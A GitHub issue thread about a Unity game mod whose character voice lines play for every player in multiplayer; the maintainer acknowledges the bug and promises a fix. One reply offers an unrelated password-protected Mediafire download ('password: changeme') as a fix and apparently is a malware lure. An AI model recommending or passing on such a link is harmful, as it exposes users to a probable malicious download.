### ISSUE TITLE
Problems with local playback of phrases

### ISSUE THREAD

**Issue by PaNFiLoVeTs** [zidaneho/SamiraMod#5]
Hi. 
When playing with friends we have a problem with the local playback of phrases in the character - during the appearance in the menu and during hits, namely - when the character is selected only one player - phrases are played not only in him, but also in other players

I assume the problem lies in variables or functions that are made global instead of local - as they should be

Also, when playing these phrases there were errors in the console (highlighted in red) that the action is not local
If you need screenshots from the console, I will try to send them soon

I tried to solve this problem myself, but dnSpy didn't want to compile to save the change because it supposedly lacked something (although I provided it with everything it needed).

And I don't have enough experience (or desire) for this work through Visual Studio yet.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by PaNFiLoVeTs** [comment]
USX is a Unreal Engine format, but not a Unity format

**Comment by zidaneho** [comment]
Hey, thanks for the feedback!

I would love to see the console errors; Ever since the initial launch, I have never tested multiplayer. Will start testing now, hopefully this will be resolved soon.

**Comment by PaNFiLoVeTs** [comment]
![image](https://github.com/user-attachments/assets/1355e300-fa72-4a6c-9ea2-cb417f213d96)
![image](https://github.com/user-attachments/assets/06e244e0-2769-4ae0-8dd8-a89bce81f007)
![image](https://github.com/user-attachments/assets/e96096a7-05d9-44c9-b908-e3bfba0bd1e2)
![image](https://github.com/user-attachments/assets/b2a054e7-17b5-4947-8217-96f653e71e44)
[LogOutput.log](https://github.com/user-attachments/files/16840092/LogOutput.log)

**Comment by PaNFiLoVeTs** [comment]
Not everything that is here can relate to this problem, but just in case I sent everything, including the log file from the moment of startup

**Comment by zidaneho** [comment]
Sorry for the late response, but I've actually found so many bugs when testing multiplayer. I have fixed the playback in the menu and sound queues in game, and much more. I am pushing this new update shortly.
